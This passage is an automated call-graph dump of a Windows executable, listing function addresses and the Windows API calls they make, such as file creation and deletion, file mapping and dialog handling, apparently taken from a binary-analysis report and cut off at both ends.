23291->23275 23292->23289 23293 7ec01d MoveFileW 23292->23293 23293->23275 23294 7ec035 MoveFileExW 23293->23294 23294->23275 23295->23275 23295->23284 23444 7db4f7 52 API calls 2 library calls 23295->23444 23297 7ed0ff __EH_prolog 23296->23297 23472 7dfead 23297->23472 23299 7ed130 23476 7d5c59 23299->23476 23301 7ed14e 23480 7d7c68 23301->23480 23305 7ed1a1 23497 7d7cfb 23305->23497 23307 7eb504 23307->23229 23309 7ecd38 23308->23309 23974 7e9d1a 23309->23974 23312 7eb5d1 23312->23086 23312->23087 23313 7ecd45 GetWindow 23313->23312 23314 7ecd65 23313->23314 23314->23312 23315 7ecd72 GetClassNameW 23314->23315 23317 7ecdfa GetWindow 23314->23317 23318 7ecd96 GetWindowLongW 23314->23318 23979 7e17ac CompareStringW 23315->23979 23317->23312 23317->23314 23318->23317 23319 7ecda6 SendMessageW 23318->23319 23319->23317 23320 7ecdbc GetObjectW 23319->23320 23980 7e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23320->23980 23322 7ecdd3 23981 7e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23322->23981 23982 7e9f5d 8 API calls ___scrt_fastfail 23322->23982 23325 7ecde4 SendMessageW DeleteObject 23325->23317 23326->23097 23328 7ea30d 23327->23328 23329 7ea2e8 23327->23329 23331 7ea31b 23328->23331 23332 7ea312 SHAutoComplete 23328->23332 23985 7e17ac CompareStringW 23329->23985 23335 7ea7c3 23331->23335 23332->23331 23333 7ea2fb 23333->23328 23334 7ea2ff FindWindowExW 23333->23334 23334->23328 23336 7ea7cd __EH_prolog 23335->23336 23337 7d1380 82 API calls 23336->23337 23338 7ea7ef 23337->23338 23986 7d1f4f 23338->23986 23341 7ea818 23344 7d1951 126 API calls 23341->23344 23342 7ea809 23343 7d1631 84 API calls 23342->23343 23345 7ea814 23343->23345 23347 7ea83a __vswprintf_c_l ___std_exception_copy 23344->23347 23345->23126 23345->23132 23346 7d1631 84 API calls 23346->23345 23347->23345 23347->23346 23348->23109 23350 7eac74 5 API calls 23349->23350 23351 7ecb66 GetDlgItem 23350->23351 23352 7ecbbc SendMessageW SendMessageW 23351->23352 23353 7ecb88 23351->23353 23354 7ecbf8 23352->23354 23355 7ecc17 SendMessageW SendMessageW SendMessageW 23352->23355 23356 7ecb93 ShowWindow SendMessageW SendMessageW 23353->23356 23354->23355 23357 7ecc6d SendMessageW 23355->23357 23358 7ecc4a SendMessageW 23355->23358 23356->23352 23357->23130 23358->23357 23359->23187 23360->23211 23361->23216 23362->23220 23363->23226 23364->23234 23365->23166 23366->23184 23367->23162 23368->23158 23369->23242 23370->23240 23372 7da214 23371->23372 23373 7da238 23372->23373 23375 7da22b CreateDirectoryW 23372->23375 23384 7da180 23373->23384 23375->23373 23377 7da26b 23375->23377 23382 7da27a 23377->23382 23397 7da444 23377->23397 23378 7da27e GetLastError 23378->23382 23381 7da254 23381->23378 23383 7da258 CreateDirectoryW 23381->23383 23382->23247 23383->23377 23383->23378 23405 7da194 23384->23405 23387 7db66c 23388 7db679 23387->23388 23396 7db683 23388->23396 23415 7db806 CharUpperW 23388->23415 23390 7db692 23416 7db832 CharUpperW 23390->23416 23392 7db6a1 23393 7db71c GetCurrentDirectoryW 23392->23393 23394 7db6a5 23392->23394 23393->23396 23417 7db806 CharUpperW 23394->23417 23396->23381 23398 7ee360 23397->23398 23399 7da451 SetFileAttributesW 23398->23399 23400 7da494 23399->23400 23401 7da467 23399->23401 23400->23382 23402 7db66c 2 API calls 23401->23402 23403 7da47b 23402->23403 23403->23400 23404 7da47f SetFileAttributesW 23403->23404 23404->23400 23413 7ee360 23405->23413 23408 7da189 23408->23378 23408->23387 23409 7da1b2 23410 7db66c 2 API calls 23409->23410 23411 7da1c6 23410->23411 23411->23408 23412 7da1ca GetFileAttributesW 23411->23412 23412->23408 23414 7da1a1 GetFileAttributesW 23413->23414 23414->23408 23414->23409 23415->23390 23416->23392 23417->23396 23419 7d9824 23418->23419 23420 7d9820 23418->23420 23419->23420 23429 7da12d 23419->23429 23420->23262 23424 7d96dc 23423->23424 23425 7d96fa 23423->23425 23424->23425 23427 7d96e8 FindCloseChangeNotification 23424->23427 23426 7d9719 23425->23426 23437 7d6e3e 74 API calls 23425->23437 23426->23262 23427->23425 23430 7ee360 23429->23430 23431 7da13a DeleteFileW 23430->23431 23432 7da14d 23431->23432 23433 7d984c 23431->23433 23434 7db66c 2 API calls 23432->23434 23433->23262 23435 7da161 23434->23435 23435->23433 23436 7da165 DeleteFileW 23435->23436 23436->23433 23437->23426 23439 7eaa40 23438->23439 23440 7eaaf3 ExpandEnvironmentStringsW 23439->23440 23441 7eab16 23439->23441 23440->23441 23441->23275 23442->23275 23443->23275 23444->23295 23445->23275 23446->23275 23447->23275 23449 7f8606 23448->23449 23450 7f861e 23449->23450 23451 7f8613 23449->23451 23453 7f8626 23450->23453 23460 7f862f __dosmaperr 23450->23460 23461 7f8518 23451->23461 23454 7f84de _free 20 API calls 23453->23454 23458 7f861b 23454->23458 23455 7f8659 HeapReAlloc 23455->23458 23455->23460 23456 7f8634 23468 7f895a 20 API calls __dosmaperr 23456->23468 23458->23275 23460->23455 23460->23456 23469 7f71ad 7 API calls 2 library calls 23460->23469 23462 7f8556 23461->23462 23467 7f8526 __dosmaperr 23461->23467 23471 7f895a 20 API calls __dosmaperr 23462->23471 23464 7f8541 RtlAllocateHeap 23465 7f8554 23464->23465 23464->23467 23465->23458 23467->23462 23467->23464 23470 7f71ad 7 API calls 2 library calls 23467->23470 23468->23458 23469->23460 23470->23467 23471->23465 23473 7dfeba 23472->23473 23501 7d1789 23473->23501 23475 7dfed2 23475->23299 23477 7dfead 23476->23477 23478 7d1789 76 API calls 23477->23478 23479 7dfed2 23478->23479 23479->23301 23481 7d7c72 __EH_prolog 23480->23481 23518 7dc827 23481->23518 23483 7d7c8d 23524 7ee24a 23483->23524 23485 7d7cb7 23530 7e440b 23485->23530 23488 7d7ddf 23489 7d7de9 23488->23489 23490 7d7e53 23489->23490 23562 7da4c6 23489->23562 23494 7d7ec4 23490->23494 23496 7da4c6 8 API calls 23490->23496 23540 7d837f 23490->23540 23492 7d7f06 23492->23305 23494->23492 23568 7d6dc1 74 API calls 23494->23568 23496->23490 23498 7d7d09 23497->23498 23500 7d7d10 23497->23500 23499 7e1acf 84 API calls 23498->23499 23499->23500 23502 7d179f 23501->23502 23513 7d17fa __vswprintf_c_l 23501->23513 23503 7d17c8 23502->23503 23514 7d6e91 74 API calls __vswprintf_c_l 23502->23514 23504 7d1827 23503->23504 23505 7d17e7 ___std_exception_copy 23503->23505 23507 7f35de 22 API calls 23504->23507 23505->23513 23516 7d6efd 75 API calls 23505->23516 23510 7d182e 23507->23510 23508 7d17be 23515 7d6efd 75 API calls 23508->23515 23510->23513 23517 7d6efd 75 API calls 23510->23517 23513->23475 23514->23508 23515->23503 23516->23513 23517->23513 23519 7dc831 __EH_prolog 23518->23519 23520 7ee24a new 8 API calls 23519->23520 23521 7dc874 23520->23521 23522 7ee24a new 8 API calls 23521->23522 23523 7dc898 23522->23523 23523->23483 23525 7ee24f ___std_exception_copy 23524->23525 23526 7ee27b 23525->23526 23536 7f71ad 7 API calls 2 library calls 23525->23536 23537 7eecce RaiseException Concurrency::cancel_current_task new 23525->23537 23538 7eecb1 RaiseException Concurrency::cancel_current_task 23525->23538 23526->23485 23531 7e4415 __EH_prolog 23530->23531 23532 7ee24a new 8 API calls 23531->23532 23533 7e4431 23532->23533 23534 7d7ce6 23533->23534 23539 7e06ba 78 API calls 23533->23539 23534->23488 23536->23525 23539->23534 23541 7d8389 __EH_prolog 23540->23541 23569 7d1380 23541->23569 23543 7d83a4 23577 7d9ef7 23543->23577 23548 7d83cf 23550 7d83d3 23548->23550 23559 7da4c6 8 API calls 23548->23559 23561 7d846e 23548->23561 23704 7dbac4 CompareStringW 23548->23704 23700 7d1631 23550->23700 23554 7d84ce 23603 7d1f00 23554->23603 23557 7d84d9 23557->23550 23607 7d3aac 23557->23607 23617 7d857b 23557->23617 23559->23548 23596 7d8517 23561->23596 23564 7da4db 23562->23564 23563 7da4df 23563->23489 23564->23563 23962 7da5f4 23564->23962 23566 7da4ef 23566->23563 23567 7da4f4 FindClose 23566->23567 23567->23563 23568->23492 23570 7d1385 __EH_prolog 23569->23570 23571 7dc827 8 API calls 23570->23571 23572 7d13bd 23571->23572 23573 7ee24a new 8 API calls 23572->23573 23576 7d1416 ___scrt_fastfail 23572->23576 23574 7d1403 23573->23574 23574->23576 23705 7db07d 23574->23705 23576->23543 23578 7d9f0e 23577->23578 23579 7d83ba 23578->23579 23721 7d6f5d 76 API calls 23578->23721 23579->23550 23581 7d19a6 23579->23581 23582 7d19b0 __EH_prolog 23581->23582 23592 7d1a00 23582->23592 23595 7d19e5 23582->23595 23722 7d709d 23582->23722 23584 7d1b50 23725 7d6dc1 74 API calls 23584->23725 23586 7d3aac 97 API calls 23590 7d1bb3 23586->23590 23587 7d1b60 23587->23586 23587->23595 23588 7d1bff 23594 7d1c32 23588->23594 23588->23595 23726 7d6dc1 74 API calls 23588->23726 23590->23588 23591 7d3aac 97 API calls 23590->23591 23591->23590 23592->23584 23592->23587 23592->23595 23593 7d3aac 97 API calls 23593->23594 23594->23593 23594->23595 23595->23548 23597 7d8524 23596->23597 23744 7e0c26 GetSystemTime SystemTimeToFileTime 23597->23744 23599 7d8488 23599->23554 23600 7e1359 23599->23600 23746 7ed51a 23600->23746 23604 7d1f05 __EH_prolog 23603->23604 23605 7d1f39 23604->23605 23754 7d1951 23604->23754 23605->23557 23608 7d3abc 23607->23608 23609 7d3ab8 23607->23609 23610 7d3ae9 23608->23610 23611 7d3af7 23608->23611 23609->23557 23614 7d3b29 23610->23614 23888 7d3281 85 API calls 3 library calls 23610->23888 23889 7d27e8 97 API calls 3 library calls 23611->23889 23614->23557 23615 7d3af5 23615->23614 23890 7d204e 74 API calls 23615->23890 23618 7d8585 __EH_prolog 23617->23618 23619 7d85be 23618->23619 23623 7d85c2 23618->23623 23912 7e84bd 99 API calls 23618->23912 23620 7d85e7 23619->23620 23619->23623 23626 7d867a 23619->23626 23622 7d8609 23620->23622 23620->23623 23913 7d7b66 151 API calls 23620->23913 23622->23623 23914 7e84bd 99 API calls 23622->23914 23623->23557 23626->23623 23891 7d5e3a 23626->23891 23628 7d8705 23628->23623 23897 7d826a 23628->23897 23631 7d8875 23632 7da4c6 8 API calls 23631->23632 23634 7d88e0 23631->23634 23632->23634 23633 7dc991 80 API calls 23639 7d893b _memcmp 23633->23639 23901 7d7d6c 23634->23901 23636 7d8a70 23637 7d8b43 23636->23637 23643 7d8abf 23636->23643 23642 7d8b9e 23637->23642 23652 7d8b4e 23637->23652 23638 7d8a69 23917 7d1f94 74 API calls 23638->23917 23639->23623 23639->23633 23639->23636 23639->23638 23915 7d8236 82 API calls 23639->23915 23916 7d1f94 74 API calls 23639->23916 23651 7d8b30 23642->23651 23920 7d80ea 96 API calls 23642->23920 23645 7da180 4 API calls 23643->23645 23643->23651 23644 7d8b9c 23646 7d9653 79 API calls 23644->23646 23649 7d8af7 23645->23649 23646->23623 23648 7d9653 79 API calls 23648->23623 23649->23651 23918 7d9377 96 API calls 23649->23918 23650 7d8c09 23663 7d8c74 23650->23663 23699 7d91c1 __except_handler4 23650->23699 23921 7d9989 23650->23921 23651->23644 23651->23650 23652->23644 23919 7d7f26 100 API calls __except_handler4 23652->23919 23653 7daa88 8 API calls 23656 7d8cc3 23653->23656 23659 7daa88 8 API calls 23656->23659 23658 7d8c4c 23658->23663 23925 7d1f94 74 API calls 23658->23925 23672 7d8cd9 23659->23672 23661 7d8c62 23926 7d7061 75 API calls 23661->23926 23663->23653 23664 7d8d9c 23665 7d8efd 23664->23665 23666 7d8df7 23664->23666 23670 7d8f0f 23665->23670 23671 7d8f23 23665->23671 23687 7d8e27 23665->23687 23667 7d8e69 23666->23667 23669 7d8e07 23666->23669 23668 7d826a CharUpperW 23667->23668 23673 7d8e84 23668->23673 23674 7d8e4d 23669->23674 23680 7d8e15 23669->23680 23675 7d92e6 121 API calls 23670->23675 23676 7e2c42 75 API calls 23671->23676 23672->23664 23927 7d9b21 SetFilePointer GetLastError SetEndOfFile 23672->23927 23682 7d8ead 23673->23682 23683 7d8eb4 23673->23683 23673->23687 23674->23687 23929 7d7907 108 API calls 23674->23929 23675->23687 23678 7d8f3c 23676->23678 23932 7e28f1 121 API calls 23678->23932 23928 7d1f94 74 API calls 23680->23928 23930 7d7698 84 API calls __except_handler4 23682->23930 23931 7d9224 94 API calls __EH_prolog 23683->23931 23692 7d904b 23687->23692 23933 7d1f94 74 API calls 23687->23933 23689 7d9156 23691 7da444 4 API calls 23689->23691 23689->23699 23690 7d9104 23907 7d9d62 23690->23907 23693 7d91b1 23691->23693 23692->23689 23692->23690 23692->23699 23934 7d9ebf SetEndOfFile 23692->23934 23693->23699 23935 7d1f94 74 API calls 23693->23935 23696 7d914b 23698 7d96d0 75 API calls 23696->23698 23698->23689 23699->23648 23701 7d1643 23700->23701 23950 7dc8ca 23701->23950 23704->23548 23706 7db087 __EH_prolog 23705->23706 23711 7dea80 80 API calls 23706->23711 23708 7db099 23712 7db195 23708->23712 23711->23708 23713 7db1a7 ___scrt_fastfail 23712->23713 23716 7e0948 23713->23716 23719 7e0908 GetCurrentProcess GetProcessAffinityMask 23716->23719 23720 7db10f 23719->23720 23720->23576 23721->23579 23727 7d16d2 23722->23727 23724 7d70b9 23724->23592 23725->23595 23726->23594 23729 7d16e8 23727->23729 23739 7d1740 __vswprintf_c_l 23727->23739 23728 7d1711 23731 7d1767 23728->23731 23736 7d172d ___std_exception_copy 23728->23736 23729->23728 23740 7d6e91 74 API calls __vswprintf_c_l 23729->23740 23733 7f35de 22 API calls 23731->23733 23732 7d1707 23741 7d6efd 75 API calls 23732->23741 23735 7d176e 23733->23735 23735->23739 23743 7d6efd 75 API calls 23735->23743 23736->23739 23742 7d6efd 75 API calls 23736->23742 23739->23724 23740->23732 23741->23728 23742->23739 23743->23739 23745 7e0c56 __vswprintf_c_l 23744->23745 23745->23599 23747 7ed527 23746->23747 23748 7dddd1 53 API calls 23747->23748 23749 7ed54a 23748->23749 23750 7d400a _swprintf 51 API calls 23749->23750 23751 7ed55c 23750->23751 23752 7ecb5a 16 API calls 23751->23752 23753 7e1372 23752->23753 23753->23554 23755 7d195d 23754->23755 23756 7d1961 23754->23756 23755->23605 23758 7d1896 23756->23758 23759 7d18a8 23758->23759 23760 7d18e5 23758->23760 23761 7d3aac 97 API calls 23759->23761 23766 7d3f18 23760->23766 23764 7d18c8 23761->23764 23764->23755 23770 7d3f21 23766->23770 23767 7d3aac 97 API calls 23767->23770 23768 7d1906 23768->23764 23771 7d1e00 23768->23771 23770->23767 23770->23768 23783 7e067c 23770->23783 23772 7d1e0a __EH_prolog 23771->23772 23791 7d3b3d 23772->23791 23774 7d1e34 23775 7d16d2 76 API calls 23774->23775 23782 7d1ebb 23774->23782 23776 7d1e4b 23775->23776 23819 7d1849 76 API calls 23776->23819 23778 7d1e63 23780 7d1e6f 23778->23780 23820 7e137a MultiByteToWideChar 23778->23820 23821 7d1849 76 API calls 23780->23821 23782->23764 23784 7e0683 23783->23784 23785 7e069e 23784->23785 23789 7d6e8c RaiseException Concurrency::cancel_current_task 23784->23789 23787 7e06af SetThreadExecutionState 23785->23787 23790 7d6e8c RaiseException Concurrency::cancel_current_task 23785->23790 23787->23770 23789->23785 23790->23787 23792 7d3b47 __EH_prolog 23791->23792 23793 7d3b5d 23792->23793 23794 7d3b79 23792->23794 23850 7d6dc1 74 API calls 23793->23850 23795 7d3dc2 23794->23795 23799 7d3ba5 23794->23799 23867 7d6dc1 74 API calls 23795->23867 23798 7d3b68 23798->23774 23799->23798 23822 7e2c42 23799->23822 23801 7d3c26 23802 7d3cb1 23801->23802 23818 7d3c1d 23801->23818 23853 7dc991 23801->23853 23835 7daa88 23802->23835 23803 7d3c22 23803->23801 23852 7d2034 76 API calls 23803->23852 23805 7d3bf4 23805->23801 23805->23803 23806 7d3c12 23805->23806 23851 7d6dc1 74 API calls 23806->23851 23811 7d3cc4 23812 7d3d3e 23811->23812 23813 7d3d48 23811->23813 23839 7d92e6 23812->23839 23859 7e28f1 121 API calls 23813->23859 23816 7d3d46 23816->23818 23860 7d1f94 74 API calls 23816->23860 23861 7e1acf 23818->23861 23819->23778 23820->23780 23821->23782 23823 7e2c51 23822->23823 23825 7e2c5b 23822->23825 23868 7d6efd 75 API calls 23823->23868 23826 7e2c9d Concurrency::cancel_current_task 23825->23826 23827 7e2ca2 ___std_exception_copy 23825->23827 23834 7e2cfd ___scrt_fastfail 23825->23834 23870 7f157a RaiseException 23826->23870 23828 7e2da9 Concurrency::cancel_current_task 23827->23828 23829 7e2cd9 23827->23829 23827->23834 23871 7f157a RaiseException 23828->23871 23869 7e2b7b 75 API calls 3 library calls 23829->23869 23833 7e2dc1 23834->23805 23836 7daa95 23835->23836 23838 7daa9f 23835->23838 23837 7ee24a new 8 API calls 23836->23837 23837->23838 23838->23811 23840 7d92f0 __EH_prolog 23839->23840 23872 7d7dc6 23840->23872 23843 7d709d 76 API calls 23844 7d9302 23843->23844 23875 7dca6c 23844->23875 23846 7d935c 23846->23816 23848 7dca6c 114 API calls 23849 7d9314 23848->23849 23849->23846 23849->23848 23884 7dcc51 97 API calls __vswprintf_c_l 23849->23884 23850->23798 23851->23818 23852->23801 23854 7dc9c4 23853->23854 23855 7dc9b2 23853->23855 23886 7d6249 80 API calls 23854->23886 23885 7d6249 80 API calls 23855->23885 23858 7dc9bc 23858->23802 23859->23816 23860->23818 23863 7e1ad9 23861->23863 23862 7e1af2 23887 7e075b 84 API calls 23862->23887 23863->23862 23866 7e1b06 23863->23866 23865 7e1af9 23865->23866 23867->23798 23868->23825 23869->23834 23870->23828 23871->23833 23873 7dacf5 GetVersionExW 23872->23873 23874 7d7dcb 23873->23874 23874->23843 23881 7dca82 __vswprintf_c_l 23875->23881 23876 7dcbf7 23877 7dcc1f 23876->23877 23878 7dca0b 6 API calls 23876->23878 23879 7e067c SetThreadExecutionState RaiseException 23877->23879 23878->23877 23882 7dcbee 23879->23882 23880 7e84bd 99 API calls 23880->23881 23881->23876 23881->23880 23881->23882 23883 7dab70 89 API calls 23881->23883 23882->23849 23883->23881 23884->23849 23885->23858 23886->23858 23887->23865 23888->23615 23889->23615 23890->23614 23892 7d5e4a 23891->23892 23936 7d5d67 23892->23936 23894 7d5e7d 23896 7d5eb5 23894->23896 23941 7dad65 CharUpperW CompareStringW 23894->23941 23896->23628 23898 7d8289 23897->23898 23947 7e179d CharUpperW 23898->23947 23900 7d8333 23900->23631 23902 7d7d7b 23901->23902 23903 7d7dbb 23902->23903 23948 7d7043 74 API calls 23902->23948 23903->23639 23905 7d7db3 23949 7d6dc1 74 API calls 23905->23949 23908 7d9d73 23907->23908 23911 7d9d82 23907->23911 23909 7d9d79 FlushFileBuffers 23908->23909 23908->23911 23909->23911 23910 7d9dfb SetFileTime 23910->23696 23911->23910 23912->23619 23913->23622 23914->23623 23915->23639 23916->23639 23917->23636 23918->23651 23919->23644 23920->23651 23922 7d998f 23921->23922 23923 7d9992 GetFileType 23921->23923 23922->23658 23924 7d99a0 23923->23924 23924->23658 23925->23661 23926->23663 23927->23664 23928->23687 23929->23687 23930->23687 23931->23687 23932->23687 23933->23692 23934->23690 23935->23699 23942 7d5c64 23936->23942 23938 7d5d88 23938->23894 23940 7d5c64 2 API calls 23940->23938 23941->23894 23943 7d5c6e 23942->23943 23945 7d5d56 23943->23945 23946 7dad65 CharUpperW CompareStringW 23943->23946 23945->23938 23945->23940 23946->23943 23947->23900 23948->23905 23949->23903 23951 7dc8db 23950->23951 23956 7da90e 23951->23956 23953 7dc90d 23954 7da90e 84 API calls 23953->23954 23955 7dc918 23954->23955 23957 7da945 23956->23957 23958 7da931 23956->23958 23957->23953 23961 7e075b 84 API calls 23958->23961 23960 7da938 23960->23957 23961->23960 23963 7da5fe 23962->23963 23964 7da691 FindNextFileW 23963->23964 23965 7da621 FindFirstFileW 23963->23965 23966 7da69c GetLastError 23964->23966 23967 7da6b0 23964->23967 23968 7da638 23965->23968 23973 7da675 23965->23973 23966->23967 23967->23973 23969 7db66c 2 API calls 23968->23969 23970 7da64d 23969->23970 23971 7da66a GetLastError 23970->23971 23972 7da651 FindFirstFileW 23970->23972 23971->23973 23972->23971 23972->23973 23973->23566 23983 7e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23974->23983 23976 7e9d21 23977 7e9d2d 23976->23977 23984 7e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23976->23984 23977->23312 23977->23313 23979->23314 23980->23322 23981->23322 23982->23325 23983->23976 23984->23977 23985->23333 23987 7d9ef7 76 API calls 23986->23987 23988 7d1f5b 23987->23988 23989 7d19a6 97 API calls 23988->23989 23992 7d1f78 23988->23992 23990 7d1f68 23989->23990 23990->23992 23993 7d6dc1 74 API calls 23990->23993 23992->23341 23992->23342 23993->23992 24879 7eb8e0 93 API calls _swprintf 24880 7e8ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24007 7d10d5 24012 7d5bd7 24007->24012 24013 7d5be1 __EH_prolog 24012->24013 24014 7db07d 82 API calls 24013->24014 24015 7d5bed 24014->24015 24021 7d5dcc GetCurrentProcess GetProcessAffinityMask 24015->24021 24030 7eead2 24031 7eeade ___DestructExceptionObject 24030->24031 24056 7ee5c7 24031->24056 24033 7eeae5 24035 7eeb0e 24033->24035 24136 7eef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24033->24136 24041 7eeb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24035->24041 24067 7f824d 24035->24067 24039 7eeb2d ___DestructExceptionObject 24047 7eebad 24041->24047 24137 7f7243 38 API calls 3 library calls 24041->24137 24075 7ef020 24047->24075 24051 7eebd9 24053 7eebe2 24051->24053 24138 7f764a 28 API calls _abort 24051->24138 24139 7ee73e 13 API calls 2 library calls 24053->24139 24057 7ee5d0 24056->24057 24140 7eed5b IsProcessorFeaturePresent 24057->24140 24059 7ee5dc 24141 7f2016 24059->24141 24061 7ee5e1 24062 7ee5e5 24061->24062 24150 7f80d7 24061->24150 24062->24033 24065 7ee5fc 24065->24033 24070 7f8264 24067->24070 24068 7eec4a DloadUnlock 5 API calls 24069 7eeb27 24068->24069 24069->24039 24071 7f81f1 24069->24071 24070->24068 24074 7f8220 24071->24074 24072 7eec4a DloadUnlock 5 API calls 24073 7f8249 24072->24073 24073->24041 24074->24072 24200 7ef350 24075->24200 24078 7eebb3 24079 7f819e 24078->24079 24202 7fb290 24079->24202 24081 7f81a7 24082 7eebbc 24081->24082 24206 7fb59a 38 API calls 24081->24206 24084 7ed5d4 24082->24084 24341 7e00cf 24084->24341 24088 7ed5f3 24390 7ea335 24088->24390 24090 7ed5fc 24394 7e13b3 GetCPInfo 24090->24394 24092 7ed606 ___scrt_fastfail 24093 7ed619 GetCommandLineW 24092->24093 24094 7ed628 24093->24094 24095 7ed6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24093->24095 24397 7ebc84 24094->24397 24097 7d400a _swprintf 51 API calls 24095->24097 24098 7ed70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24097->24098 24408 7eaded LoadBitmapW 24098->24408 24101 7ed636 OpenFileMappingW 24104 7ed64f MapViewOfFile 24101->24104 24105 7ed696 CloseHandle 24101->24105 24102 7ed6a0 24402 7ed287 24102->24402 24108 7ed68d UnmapViewOfFile 24104->24108 24109 7ed660 __vswprintf_c_l 24104->24109 24105->24095 24108->24105 24113 7ed287 2 API calls 24109->24113 24115 7ed67c 24113->24115 24114 7e8835 8 API calls 24116 7ed76a DialogBoxParamW 24114->24116 24115->24108 24117 7ed7a4 24116->24117 24118 7ed7bd 24117->24118 24119 7ed7b6 Sleep 24117->24119 24120 7ed7cb 24118->24120 24438 7ea544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24118->24438 24119->24118 24122 7ed7ea DeleteObject 24120->24122 24123 7ed7ff DeleteObject 24122->24123 24124 7ed806 24122->24124 24123->24124 24125 7ed849 24124->24125 24126 7ed837 24124->24126 24435 7ea39d 24125->24435 24439 7ed2e6 6 API calls 24126->24439 24128 7ed83d CloseHandle 24128->24125 24130 7ed883 24131 7f757e GetModuleHandleW 24130->24131 24132 7eebcf 24131->24132 24132->24051 24133 7f76a7 24132->24133 24573 7f7424 24133->24573 24136->24033 24137->24047 24138->24053 24139->24039 24140->24059 24142 7f201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24141->24142 24154 7f310e 24142->24154 24146 7f2031 24147 7f203c 24146->24147 24168 7f314a DeleteCriticalSection 24146->24168 24147->24061 24149 7f2029 24149->24061 24196 7fb73a 24150->24196 24153 7f203f 8 API calls 3 library calls 24153->24062 24156 7f3117 24154->24156 24157 7f3140 24156->24157 24158 7f2025 24156->24158 24169 7f3385 24156->24169 24174 7f314a DeleteCriticalSection 24157->24174 24158->24149 24160 7f215c 24158->24160 24189 7f329a 24160->24189 24162 7f2166 24167 7f2171 24162->24167 24194 7f3348 6 API calls try_get_function 24162->24194 24164 7f217f 24165 7f218c 24164->24165 24195 7f218f 6 API calls ___vcrt_FlsFree 24164->24195 24165->24146 24167->24146 24168->24149 24175 7f3179 24169->24175 24172 7f33bc InitializeCriticalSectionAndSpinCount 24173 7f33a8 24172->24173 24173->24156 24174->24158 24176 7f31a9 24175->24176 24177 7f31ad 24175->24177 24176->24177 24180 7f31cd 24176->24180 24182 7f3219 24176->24182 24177->24172 24177->24173 24179 7f31d9 GetProcAddress 24181 7f31e9 __crt_fast_encode_pointer 24179->24181 24180->24177 24180->24179 24181->24177 24183 7f3241 LoadLibraryExW 24182->24183 24187 7f3236 24182->24187 24184 7f325d GetLastError 24183->24184 24185 7f3275 24183->24185 24184->24185 24188 7f3268 LoadLibraryExW 24184->24188 24186 7f328c FreeLibrary 24185->24186 24185->24187 24186->24187 24187->24176 24188->24185 24190 7f3179 try_get_function 5 API calls 24189->24190 24191 7f32b4 24190->24191 24192 7f32cc TlsAlloc 24191->24192 24193 7f32bd 24191->24193 24193->24162 24194->24164 24195->24167 24197 7fb753 24196->24197 24198 7eec4a DloadUnlock 5 API calls 24197->24198 24199 7ee5ee 24198->24199 24199->24065 24199->24153 24201 7ef033 GetStartupInfoW 24200->24201 24201->24078 24203 7fb2a2 24202->24203 24204 7fb299 24202->24204 24203->24081 24207 7fb188 24204->24207 24206->24081 24208 7f8fa5 FindHandlerForForeignException 38 API calls 24207->24208 24209 7fb195 24208->24209 24227 7fb2ae 24209->24227 24211 7fb19d 24236 7faf1b 24211->24236 24214 7fb1b4 24214->24203 24215 7f8518 __onexit 21 API calls 24216 7fb1c5 24215->24216 24217 7fb1f7 24216->24217 24243 7fb350 24216->24243 24219 7f84de _free 20 API calls 24217->24219 24219->24214 24221 7fb1f2 24253 7f895a 20 API calls __dosmaperr 24221->24253 24223 7fb23b 24223->24217 24254 7fadf1 26 API calls 24223->24254 24224 7fb20f 24224->24223 24225 7f84de _free 20 API calls 24224->24225 24225->24223 24228 7fb2ba ___DestructExceptionObject 24227->24228 24229 7f8fa5 FindHandlerForForeignException 38 API calls 24228->24229 24234 7fb2c4 24229->24234 24231 7fb348 ___DestructExceptionObject 24231->24211 24234->24231 24235 7f84de _free 20 API calls 24234->24235 24255 7f8566 38 API calls _abort 24234->24255 24256 7fa3f1 EnterCriticalSection 24234->24256 24257 7fb33f LeaveCriticalSection _abort 24234->24257 24235->24234 24237 7f3dd6 __cftof 38 API calls 24236->24237 24238 7faf2d 24237->24238 24239 7faf4e 24238->24239 24240 7faf3c GetOEMCP 24238->24240 24241 7faf65 24239->24241 24242 7faf53 GetACP 24239->24242 24240->24241 24241->24214 24241->24215 24242->24241 24244 7faf1b 40 API calls 24243->24244 24245 7fb36f 24244->24245 24248 7fb3c0 IsValidCodePage 24245->24248 24250 7fb376 24245->24250 24252 7fb3e5 ___scrt_fastfail 24245->24252 24246 7eec4a DloadUnlock 5 API calls 24247 7fb1ea 24246->24247 24247->24221 24247->24224 24249 7fb3d2 GetCPInfo 24248->24249 24248->24250 24249->24250 24249->24252 24250->24246 24258 7faff4 GetCPInfo 24252->24258 24253->24217 24254->24217 24256->24234 24257->24234 24259 7fb0d8 24258->24259 24261 7fb02e 24258->24261 24263 7eec4a DloadUnlock 5 API calls 24259->24263 24268 7fc099 24261->24268 24265 7fb184 24263->24265 24265->24250 24267 7fa275 __vswprintf_c_l 43 API calls 24267->24259 24269 7f3dd6 __cftof 38 API calls 24268->24269 24270 7fc0b9 MultiByteToWideChar 24269->24270 24272 7fc0f7 24270->24272 24273 7fc18f 24270->24273 24275 7f8518 __onexit 21 API calls 24272->24275 24279 7fc118 __vsnwprintf_l ___scrt_fastfail 24272->24279 24274 7eec4a DloadUnlock 5 API calls 24273->24274 24276 7fb08f 24274->24276 24275->24279 24282 7fa275 24276->24282 24277 7fc189 24287 7fa2c0 20 API calls _free 24277->24287 24279->24277 24280 7fc15d MultiByteToWideChar 24279->24280 24280->24277 24281 7fc179 GetStringTypeW 24280->24281 24281->24277 24283 7f3dd6 __cftof 38 API calls 24282->24283 24284 7fa288 24283->24284 24288 7fa058 24284->24288 24287->24273 24290 7fa073 __vswprintf_c_l 24288->24290 24289 7fa099 MultiByteToWideChar 24291 7fa0c3 24289->24291 24302 7fa24d 24289->24302 24290->24289 24294 7f8518 __onexit 21 API calls 24291->24294 24300 7fa0e4 __vsnwprintf_l 24291->24300 24292 